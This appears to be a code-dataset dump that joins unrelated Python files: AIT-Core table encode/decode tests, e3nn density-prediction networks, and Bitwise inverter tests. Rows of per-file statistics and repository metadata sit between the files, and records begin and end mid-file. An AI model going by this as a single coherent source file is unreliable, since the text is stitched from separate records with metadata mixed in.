bgColor=\"#9b95c9\">1734317d-40c6-4950-b1f1-f45393970f63</td><td align=\"center\" bgColor=\"#9b95c9\"> 9</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#9b95c9\"> 6</td></tr><tr> <td align=\"center\" bgColor=\"#9b95c9\">BCC云主机</td><td align=\"center\" bgColor=\"#9b95c9\">33ee9b2d-228b-42c2-aae5-b1f1841374fb</td><td align=\"center\" bgColor=\"#9b95c9\"> 6</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">0a784fe6cc4d49879b882645023aaa73</td><td align=\"center\" bgColor=\"#867892\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">dcf5a8476ba443988322ed577d67b8ef1</td><td align=\"center\" bgColor=\"#867892\"> 10</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">1734317d-40c6-4950-b1f1-f45393970f63</td><td align=\"center\" bgColor=\"#867892\"> 7</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#867892\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#867892\">SCS缓存服务</td><td align=\"center\" bgColor=\"#867892\">33ee9b2d-228b-42c2-aae5-b1f1841374fb</td><td align=\"center\" bgColor=\"#867892\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#fab27b\">BOS对象存储服务</td><td align=\"center\" bgColor=\"#fab27b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#fab27b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#b7ba6b\">CDN服务</td><td align=\"center\" bgColor=\"#b7ba6b\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#b7ba6b\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#769149\"> 5</td></tr><tr> <td align=\"center\" bgColor=\"#769149\">SES邮件服务</td><td align=\"center\" bgColor=\"#769149\">bbe13106ecaa4a9aa73188720f0e1193</td><td align=\"center\" bgColor=\"#769149\"> 5</td></tr></table></div></body></html>') assert resp.status == 200, 'status is not 200'
65.48583
5,004
0.651623
2,109
16,175
4.899953
0.10147
0.078769
0.088059
0.135475
0.870041
0.835978
0.809657
0.786723
0.769112
0.753919
0
0.074181
0.184915
16,175
246
5,005
65.752033
0.709648
0.015456
0
0.632653
0
0.010204
0.50341
0.23175
0
0
0
0
0.112245
0
null
null
0.005102
0.045918
null
null
0.081633
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
0e76d767bc077eaf0b0b96f156f317aeedd18ada
12,905
py
Python
tests/ait/core/test_table.py
davidryanshay/AIT-Core
337da653d9c698b3d56ef1eb319c93adb6413829
[ "MIT" ]
1
2022-01-22T13:55:49.000Z
2022-01-22T13:55:49.000Z
tests/ait/core/test_table.py
davidryanshay/AIT-Core
337da653d9c698b3d56ef1eb319c93adb6413829
[ "MIT" ]
2
2021-09-16T19:14:52.000Z
2021-09-16T19:16:03.000Z
tests/ait/core/test_table.py
davidryanshay/AIT-Core
337da653d9c698b3d56ef1eb319c93adb6413829
[ "MIT" ]
null
null
null
import datetime as dt import inspect import os.path import tempfile import unittest import ait.core.dmc as dmc import ait.core.dtype as dtype from ait.core import table test_table = """ - !FSWTable name: test_type delimiter: "," header: - !FSWColumn name: MAGIC_NUM desc: The first column in our header format: "%x" units: none type: U8 bytes: 0 - !FSWColumn name: UPTYPE desc: The second column in our header format: "%u" units: none type: U8 bytes: 1 - !FSWColumn name: VERSION desc: The third column in our header format: "%u" units: none type: U8 bytes: 2 columns: - !FSWColumn name: COLUMN_ONE desc: First FSW Table Column format: "%u" units: none type: MSB_U16 bytes: [0,1] - !FSWColumn name: COLUMN_TWO desc: Second FSW Table Column format: "%u" units: none type: MSB_U16 bytes: [2,3] - !FSWColumn name: COLUMN_THREE desc: Third FSW Table Column format: "%u" units: none type: U8 bytes: 4 enum: 0: TEST_ENUM_0 1: TEST_ENUM_1 2: TEST_ENUM_2 3: TEST_ENUM_3 """ class TestTableEncode(unittest.TestCase): @classmethod def setUpClass(cls): cls.table_defn_path = os.path.join(tempfile.gettempdir(), "test_table.yaml") with open(cls.table_defn_path, "w") as infile: infile.write(test_table) cls.tabdict = table.FSWTabDict(cls.table_defn_path) def test_enum_encode(self): defn = self.tabdict["test_type"] table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"] encoded = defn.encode(text_in=table_data) assert len(encoded) == 13 # Check header assert encoded[0] == 13 assert encoded[1] == 12 assert encoded[2] == 11 # Check first row assert encoded[3] == 0 assert encoded[4] == 1 assert encoded[5] == 0 assert encoded[6] == 2 assert encoded[7] == 3 # Check second row assert encoded[8] == 0 assert encoded[9] == 4 assert encoded[10] == 0 assert encoded[11] == 5 assert encoded[12] == 0 def test_encode_text_no_hdr(self): defn = self.tabdict["test_type"] table_data = ["13,12,11", "1,2,3", "4,5,6"] encoded = defn.encode(text_in=table_data) assert len(encoded) == 13 # Check header assert encoded[0] == 13 assert encoded[1] == 12 assert encoded[2] == 11 # Check first row assert encoded[3] == 0 assert encoded[4] == 1 assert encoded[5] == 0 assert encoded[6] == 2 assert encoded[7] == 3 # Check second row assert encoded[8] == 0 assert encoded[9] == 4 assert encoded[10] == 0 assert encoded[11] == 5 assert encoded[12] == 6 def test_encode_text_with_hdr(self): defn = self.tabdict["test_type"] table_data = ["1,2,3", "4,5,6"] hdr_vals = [13, 12, 11] encoded = defn.encode(text_in=table_data, hdr_vals=hdr_vals) assert len(encoded) == 13 # Check header assert encoded[0] == 13 assert encoded[1] == 12 assert encoded[2] == 11 # Check first row assert encoded[3] == 0 assert encoded[4] == 1 assert encoded[5] == 0 assert encoded[6] == 2 assert encoded[7] == 3 # Check second row assert encoded[8] == 0 assert encoded[9] == 4 assert encoded[10] == 0 assert encoded[11] == 5 assert encoded[12] == 6 def test_encode_file_no_hdr(self): defn = self.tabdict["test_type"] table_data = """ 13,12,11 1,2,3 4,5,6 """ tmp_table_input = os.path.join(tempfile.gettempdir(), "test_table.txt") with open(tmp_table_input, "w") as in_file: in_file.write(table_data) with open(tmp_table_input, "r") as in_file: encoded = defn.encode(file_in=in_file) assert len(encoded) == 13 # Check header assert encoded[0] == 13 assert encoded[1] == 12 assert encoded[2] == 11 # Check first row assert encoded[3] == 0 assert encoded[4] == 1 assert encoded[5] == 0 assert encoded[6] == 2 assert encoded[7] == 3 # Check second row assert encoded[8] == 0 assert encoded[9] == 4 assert encoded[10] == 0 assert encoded[11] == 5 assert encoded[12] == 6 os.remove(tmp_table_input) def test_encode_file_with_hdr(self): defn = self.tabdict["test_type"] table_data = """ 1,2,3 4,5,6 """ hdr_vals = [13, 12, 11] tmp_table_input = os.path.join(tempfile.gettempdir(), "test_table.txt") with open(tmp_table_input, "w") as in_file: in_file.write(table_data) with open(tmp_table_input, "r") as in_file: encoded = defn.encode(file_in=in_file, hdr_vals=hdr_vals) assert len(encoded) == 13 # Check header assert encoded[0] == 13 assert encoded[1] == 12 assert encoded[2] == 11 # Check first row assert encoded[3] == 0 assert encoded[4] == 1 assert encoded[5] == 0 assert encoded[6] == 2 assert encoded[7] == 3 # Check second row assert encoded[8] == 0 assert encoded[9] == 4 assert encoded[10] == 0 assert encoded[11] == 5 assert encoded[12] == 6 os.remove(tmp_table_input) class TestTableDecode(unittest.TestCase): @classmethod def setUpClass(cls): cls.table_defn_path = os.path.join(tempfile.gettempdir(), "test_table.yaml") with open(cls.table_defn_path, "w") as infile: infile.write(test_table) cls.tabdict = table.FSWTabDict(cls.table_defn_path) def test_decode_binary(self): defn = self.tabdict["test_type"] table_data = ["13,12,11", "1,2,8", "4,5,6"] encoded = defn.encode(text_in=table_data) decoded = defn.decode(bin_in=encoded) # Check header assert decoded[0][0] == 13 assert decoded[0][1] == 12 assert decoded[0][2] == 11 # Check first row assert decoded[1][0] == 1 assert decoded[1][1] == 2 assert decoded[1][2] == 8 # Check first row assert decoded[2][0] == 4 assert decoded[2][1] == 5 assert decoded[2][2] == 6 def test_enum_decode(self): defn = self.tabdict["test_type"] table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"] encoded = defn.encode(text_in=table_data) bin_file = os.path.join(tempfile.gettempdir(), "test_table_in.bin") with open(bin_file, "wb") as out_file: out_file.write(encoded) with open(bin_file, "rb") as out_file: decoded = defn.decode(file_in=out_file) # Check header assert decoded[0][0] == 13 assert decoded[0][1] == 12 assert decoded[0][2] == 11 # Check first row assert decoded[1][0] == 1 assert decoded[1][1] == 2 assert decoded[1][2] == "TEST_ENUM_3" # Check first row assert decoded[2][0] == 4 assert decoded[2][1] == 5 assert decoded[2][2] == "TEST_ENUM_0" def test_enum_decode_raw_values(self): defn = self.tabdict["test_type"] table_data = ["13,12,11", "1,2,TEST_ENUM_3", "4,5,TEST_ENUM_0"] encoded = defn.encode(text_in=table_data) bin_file = os.path.join(tempfile.gettempdir(), "test_table_in.bin") with open(bin_file, "wb") as out_file: out_file.write(encoded) with open(bin_file, "rb") as out_file: decoded = defn.decode(file_in=out_file, raw=True) # Check header assert decoded[0][0] == 13 assert decoded[0][1] == 12 assert decoded[0][2] == 11 # Check first row assert decoded[1][0] == 1 assert decoded[1][1] == 2 assert decoded[1][2] == 3 # Check first row assert decoded[2][0] == 4 assert decoded[2][1] == 5 assert decoded[2][2] == 0 class TestBadEnumHandling(unittest.TestCase): def test_table_duplicate_enum_load(self): test_table = """ - !FSWTable name: test_type delimiter: "," header: - !FSWColumn name: MAGIC_NUM desc: The first column in our header format: "%x" units: none type: U8 bytes: 0 columns: - !FSWColumn name: COLUMN_THREE desc: Third FSW Table Column format: "%u" units: none type: U8 bytes: 4 enum: 0: TEST_ENUM_0 1: TEST_ENUM_1 2: TEST_ENUM_2 3: TEST_ENUM_3 4: TEST_ENUM_0 """ table_defn_path = os.path.join( tempfile.gettempdir(), "test_table_dupe_enum.yaml" ) with open(table_defn_path, "w") as infile: infile.write(test_table) with self.assertLogs("ait", level="ERROR") as cm: tabdict = table.FSWTabDict(table_defn_path) assert len(cm.output) == 1 class TestTableTimeHandling(unittest.TestCase): @classmethod def setUpClass(cls): cls.table_defn_path = os.path.join( tempfile.gettempdir(), "test_time_table.yaml" ) with open(cls.table_defn_path, "w") as infile: infile.write( inspect.cleandoc( """ - !FSWTable name: test_type delimiter: "," header: - !FSWColumn name: MAGIC_NUM desc: The first column in our header type: U8 bytes: 0 - !FSWColumn name: UPTYPE desc: The second column in our header type: U8 bytes: 1 - !FSWColumn name: VERSION desc: The third column in our header type: U8 bytes: 2 columns: - !FSWColumn name: COLUMN_ONE desc: First FSW Table Column type: TIME64 bytes: [0,7] - !FSWColumn name: COLUMN_TWO desc: Second FSW Table Column type: TIME40 bytes: [8,12] - !FSWColumn name: COLUMN_THREE desc: Third FSW Table Column type: TIME32 bytes: [13,16] """ ) ) cls.tabdict = table.FSWTabDict(cls.table_defn_path) def test_end_to_end_time_handling(self): defn = self.tabdict["test_type"] seq_time = dt.datetime.utcnow() + dt.timedelta(days=1) seq_time_str = seq_time.strftime(dmc.RFC3339_Format) table_data = ["1,2,3", f"{seq_time_str}, {seq_time_str}, {seq_time_str}"] encoded = defn.encode(text_in=table_data) decoded = defn.decode(bin_in=encoded) # We expect to see some loss of precision with Time40 and Time32. # Verify that the table handling is doing what we expect here. assert decoded[1][0] == seq_time_str t40 = dtype.Time40Type() assert decoded[1][1] == t40.decode(t40.encode(seq_time)).strftime( dmc.RFC3339_Format ) t32 = dtype.Time32Type() assert decoded[1][2] == t32.decode(t32.encode(seq_time)).strftime( dmc.RFC3339_Format ) # Now format the datetime with the removal of subseconds. All the time types # should handle this without loss of precision. seq_time = (dt.datetime.utcnow() + dt.timedelta(days=1)).replace(microsecond=0) seq_time_str = seq_time.strftime(dmc.RFC3339_Format) table_data = ["1,2,3", f"{seq_time_str}, {seq_time_str}, {seq_time_str}"] encoded = defn.encode(text_in=table_data) decoded = defn.decode(bin_in=encoded) assert decoded[1][0] == seq_time_str assert decoded[1][1] == seq_time_str assert decoded[1][2] == seq_time_str
27.693133
87
0.530725
1,619
12,905
4.077208
0.102532
0.128011
0.042418
0.031662
0.856385
0.855173
0.845326
0.821694
0.821694
0.790941
0
0.057445
0.361953
12,905
465
88
27.752688
0.744231
0.047269
0
0.756494
0
0
0.218716
0.002287
0
0
0
0
0.340909
1
0.042208
false
0
0.025974
0
0.081169
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7ee75a1e4b88027829802ef8f634065be8c69f02
136
py
Python
tests/__init__.py
xamQrexii/gw-proxy-serverless
ec7ca7db992cd0e2bd32290a33f956164b480504
[ "Apache-2.0" ]
null
null
null
tests/__init__.py
xamQrexii/gw-proxy-serverless
ec7ca7db992cd0e2bd32290a33f956164b480504
[ "Apache-2.0" ]
null
null
null
tests/__init__.py
xamQrexii/gw-proxy-serverless
ec7ca7db992cd0e2bd32290a33f956164b480504
[ "Apache-2.0" ]
null
null
null
# add modules dependencies to test's sys.path import sys sys.path.append('./modules/OSBot-AWS') sys.path.append('./modules/OSBot-Utils')
34
45
0.757353
22
136
4.681818
0.590909
0.203884
0.252427
0.38835
0.485437
0
0
0
0
0
0
0
0.073529
136
4
46
34
0.81746
0.316176
0
0
0
0
0.434783
0.228261
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
7d0ec0cbc80b01acacfded9a188f964e3b934727
7,392
py
Python
ml-dft-sandia/networks/e3nn_example/networks.py
DanielKotik/mala
1b89a78f5ddecb1df21d2753715001ffe4250fc1
[ "BSD-3-Clause" ]
11
2021-09-06T18:59:24.000Z
2022-03-17T13:36:52.000Z
ml-dft-sandia/networks/e3nn_example/networks.py
DanielKotik/mala
1b89a78f5ddecb1df21d2753715001ffe4250fc1
[ "BSD-3-Clause" ]
92
2021-09-04T06:38:14.000Z
2022-03-31T11:01:49.000Z
ml-dft-sandia/networks/e3nn_example/networks.py
DanielKotik/mala
1b89a78f5ddecb1df21d2753715001ffe4250fc1
[ "BSD-3-Clause" ]
10
2021-09-07T13:03:30.000Z
2022-03-23T07:49:14.000Z
## networks for density prediction import numpy as np import torch from functools import partial from e3nn.kernel import Kernel from e3nn.point.operations import Convolution from e3nn.non_linearities import GatedBlock from e3nn.non_linearities import rescaled_act from e3nn.non_linearities.rescaled_act import relu, sigmoid from e3nn.radial import CosineBasisModel from e3nn.radial import GaussianRadialModel class Mixer(torch.nn.Module): def __init__(self, Op, Rs_in_s, Rs_out): super().__init__() self.ops = torch.nn.ModuleList([ Op(Rs_in, Rs_out) for Rs_in in Rs_in_s ]) def forward(self, *args, n_norm=1): # It simply sums the different outputs y = 0 for m, x in zip(self.ops, args): y += m(*x, n_norm=n_norm) return y class MixerNetwork(torch.nn.Module): def __init__(self, Rs_in, Rs_out_list, max_radius=3.0, number_of_basis=3, radial_layers=3, basistype="Gaussian"): super().__init__() #sp = rescaled_act.Softplus(beta=5) #sp = rescaled_act.ShiftedSoftplus(beta=5) sp = torch.nn.Tanh() # the [0] is just to get first_layer in stripped form. # will not work for Rs_in with more than L=0 first_layer = Rs_in[0] last_shared_layer = (2,1,1) representations = [first_layer, last_shared_layer] representations = [[(mul, l) for l, mul in enumerate(rs)] for rs in representations] if (basistype == 'Gaussian'): rad_basis = GaussianRadialModel elif (basistype == 'Cosine'): rad_basis = CosineBasisModel else: print ("Only Gaussian and Cosine Radial basis are currently supported") RadialModel = partial(rad_basis, max_radius=max_radius, number_of_basis=number_of_basis, h=100, L=radial_layers, act=sp) K = partial(Kernel, RadialModel=RadialModel) C = partial(Convolution, K) M = partial(Mixer, C) # wrap C to accept many input types def make_layer(Rs_in, Rs_out): act = GatedBlock(Rs_out, sp, sigmoid) conv = Convolution(K, Rs_in, act.Rs_in) return torch.nn.ModuleList([conv, act]) self.layers = torch.nn.ModuleList([ make_layer(Rs_layer_in,Rs_layer_out) for Rs_layer_in, Rs_layer_out in zip(representations[:-1], representations[1:]) ]) ## set up the split final layer m = [] for rs in Rs_out_list: m.append(M([representations[-1], representations[-1]], rs)) # final layer is indexed in order of atom type self.final_layer = torch.nn.ModuleList([ m[i] for i in range(len(m)) ]) def forward(self, input, geometry, atom_type_map): output = input batch, N, _ = geometry.shape for conv, act in self.layers: output = conv(output, geometry, n_norm=N) output = act(output) ## split final layer geometry_list = [] feature_list = [] for i, item in enumerate(atom_type_map): geometry_list.append(geometry[0][item]) feature_list.append(output[0][item]) ## this is assuming that there are only two atom types! ## it should work, though for any arbitrary order of O and H in xyzfile! featuresO = feature_list[0].unsqueeze(0) featuresH = feature_list[1].unsqueeze(0) geometryO = geometry_list[0].unsqueeze(0) geometryH = geometry_list[1].unsqueeze(0) final_layer_output = [] for i, layer in enumerate(self.final_layer): if (i == 0): final = layer((featuresO, geometryO, geometryO), (featuresH, geometryH, geometryO), n_norm = N) if (i == 1): final = layer((featuresO, geometryO, geometryH), (featuresH, geometryH, geometryH), n_norm = N) final_layer_output.append(final) # return list of outputO and outputH output = final_layer_output return output class SplitNetwork(torch.nn.Module): def __init__(self, Rs_in, Rs_out_list, max_radius=3.0, number_of_basis=3, radial_layers=3, basistype="Gaussian"): super().__init__() #sp = rescaled_act.Softplus(beta=5) sp = rescaled_act.ShiftedSoftplus(beta=5) #sp = torch.nn.Tanh() # the [0] is just to get first_layer in stripped form. # will not work for Rs_in with more than L=0 first_layer = Rs_in[0] #last_shared_layer = (2,1,1) last_shared_layer = (1,1,1,1,1,1) representations = [first_layer, last_shared_layer] representations = [[(mul, l) for l, mul in enumerate(rs)] for rs in representations] if (basistype == 'Gaussian'): rad_basis = GaussianRadialModel elif (basistype == 'Cosine'): rad_basis = CosineBasisModel else: print ("Only Gaussian and Cosine Radial basis are currently supported") RadialModel = partial(rad_basis, max_radius=max_radius, number_of_basis=number_of_basis, h=100, L=radial_layers, act=sp) K = partial(Kernel, RadialModel=RadialModel) def make_layer(Rs_in, Rs_out): act = GatedBlock(Rs_out, sp, sigmoid) conv = Convolution(K, Rs_in, act.Rs_in) return torch.nn.ModuleList([conv, act]) self.layers = torch.nn.ModuleList([ make_layer(Rs_layer_in,Rs_layer_out) for Rs_layer_in, Rs_layer_out in zip(representations[:-1], representations[1:]) ]) ## set up the split final layer # final layer is indexed in order of atom type self.final_layer = torch.nn.ModuleList([ Convolution(K, representations[-1], rs) for rs in Rs_out_list ]) def forward(self, input, geometry, atom_type_map): output = input batch, N, _ = geometry.shape for conv, act in self.layers: output = conv(output, geometry, n_norm=N) output = act(output) ## split final layer geometry_list = [] feature_list = [] for i, item in enumerate(atom_type_map): geometry_list.append(geometry[0][item]) feature_list.append(output[0][item]) ## this is assuming that there are only two atom types! ## it should work, though for any arbitrary order of O and H in xyzfile! featuresO = feature_list[0].unsqueeze(0) featuresH = feature_list[1].unsqueeze(0) geometryO = geometry_list[0].unsqueeze(0) geometryH = geometry_list[1].unsqueeze(0) final_layer_output = [] for i, layer in enumerate(self.final_layer): if (i == 0): final = layer(featuresO, geometryO) #final = layer((featuresO, geometryO, geometryO), (featuresH, geometryH, geometryO), n_norm = N) if (i == 1): final = layer(featuresH, geometryH) #final = layer((featuresO, geometryO, geometryH), (featuresH, geometryH, geometryH), n_norm = N) final_layer_output.append(final) # return list of outputO and outputH output = final_layer_output return output
36.594059
117
0.608766
948
7,392
4.556962
0.166667
0.050926
0.027546
0.014583
0.840741
0.826852
0.813889
0.813889
0.813889
0.813889
0
0.014573
0.294508
7,392
202
118
36.594059
0.813806
0.154356
0
0.721805
0
0
0.026705
0
0
0
0
0
0
1
0.06015
false
0
0.075188
0
0.195489
0.015038
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7d4a7a1b95fecb1982d7d8746e02567b6b4a3505
21,138
py
Python
tests/signal/test_ControlledInverter16.py
jamesjiang52/Bitwise
c71f151d23034b3f9e2a939f637be0eaa16c45c3
[ "MIT" ]
null
null
null
tests/signal/test_ControlledInverter16.py
jamesjiang52/Bitwise
c71f151d23034b3f9e2a939f637be0eaa16c45c3
[ "MIT" ]
null
null
null
tests/signal/test_ControlledInverter16.py
jamesjiang52/Bitwise
c71f151d23034b3f9e2a939f637be0eaa16c45c3
[ "MIT" ]
null
null
null
import bitwise as bw class TestControlledInverter16: def test_ControlledInverter16(self): enable = bw.wire.Wire() input_1 = bw.wire.Wire() input_2 = bw.wire.Wire() input_3 = bw.wire.Wire() input_4 = bw.wire.Wire() input_5 = bw.wire.Wire() input_6 = bw.wire.Wire() input_7 = bw.wire.Wire() input_8 = bw.wire.Wire() input_9 = bw.wire.Wire() input_10 = bw.wire.Wire() input_11 = bw.wire.Wire() input_12 = bw.wire.Wire() input_13 = bw.wire.Wire() input_14 = bw.wire.Wire() input_15 = bw.wire.Wire() input_16 = bw.wire.Wire() output_1 = bw.wire.Wire() output_2 = bw.wire.Wire() output_3 = bw.wire.Wire() output_4 = bw.wire.Wire() output_5 = bw.wire.Wire() output_6 = bw.wire.Wire() output_7 = bw.wire.Wire() output_8 = bw.wire.Wire() output_9 = bw.wire.Wire() output_10 = bw.wire.Wire() output_11 = bw.wire.Wire() output_12 = bw.wire.Wire() output_13 = bw.wire.Wire() output_14 = bw.wire.Wire() output_15 = bw.wire.Wire() output_16 = bw.wire.Wire() input_bus = bw.wire.Bus16( input_1, input_2, input_3, input_4, input_5, input_6, input_7, input_8, input_9, input_10, input_11, input_12, input_13, input_14, input_15, input_16 ) output_bus = bw.wire.Bus16( output_1, output_2, output_3, output_4, output_5, output_6, output_7, output_8, output_9, output_10, output_11, output_12, output_13, output_14, output_15, output_16 ) a = bw.signal.ControlledInverter16(enable, input_bus, output_bus) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 0 input_16.value = 0 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 0 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 0 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 0 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 0 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 0 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 0 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 0 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 0 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 0 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 0 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 0 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 0 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 0 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 input_11.value = 1 input_12.value = 1 input_13.value = 1 input_14.value = 1 input_15.value = 1 input_16.value = 1 assert output_bus.wire_values == ( 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1) enable.value = 0 input_1.value = 0 input_2.value = 0 input_3.value = 1 input_4.value = 1 input_5.value = 1 input_6.value = 1 input_7.value = 1 input_8.value = 1 input_9.value = 1 input_10.value = 1 